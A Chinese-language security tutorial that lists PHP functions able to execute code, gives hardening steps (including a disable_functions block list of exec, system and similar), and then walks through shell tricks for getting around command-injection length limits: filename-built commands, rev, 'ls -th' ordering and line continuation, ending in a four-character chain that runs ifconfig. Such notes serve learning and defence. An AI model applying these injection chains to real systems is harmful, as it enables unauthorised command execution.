1. php代码执行方式
涉及到的函数:
eval
require
include
assert
preg_match
create_function
2. php代码执行防御方式
-
升级到PHP 7.1,该版本对大部分常见的执行动态代码的方法进行了封堵。
-
php.ini中,关闭“allow_url_fopen”。在打开它的情况下,可以通过 phar:// 等协议丢给include,让其执行动态代码。
-
php.ini中,通过disable_functions关闭 exec,passthru,shell_exec,system 等函数,禁止PHP调用外部程序。
-
永远不要在代码中使用eval。
-
设置好上传文件夹的权限,禁止从该文件夹执行代码。
-
include 文件的时候,注意文件的来源;需要动态include时做好参数过滤。
3. 命令注入突破长度限制
我们先创建一个文件夹,确保里面没有任何文件。
3.1 命令组装
依次执行下面三条命令,相当于执行echo hello
>echo
>hello
*
3.2 反转命令
如果我们想执行,ls -l 但是命令被限制了一次只能执行4个字符。如果我们使用以下命令:
>ls
>-l
是会失败的。
我们使用另外一个方法,使得命令反转:
>l-
>sl
使用如下命令,将l- sl输入到文件夹v中。
>dir
*>v
>rev #功能为反转内容,rev 123 ==》 321
*v #相当于rev v
将*v写入到新的文件中并执行新文件:
*v>e
sh e
3.3 控制顺序
跟上面的一样,我们需要执行ls -l。
>-l
>\ \\
>ls\\
ls -th >e
sh e
3.4 命令续行
我们首先要知道下面命令是可以执行的,也就是命令是可以换行的:
l\
s
我们凑一个ifconfig:
>ig\\
>nf\\
>co\\
>if\\
ls -th>q
sh q
3.5 完整利用链
1.生成 ls -th >g命令,只能用g或者位置小于g的字符,否则会出错:
>g\>
>ht-
>sl
>dir
*>v
>rev
*v>x
>\;
>ig\\
>nf\\
>co\\
>if\\
sh x
实现了最多4个字符,最终执行了ifconfig命令: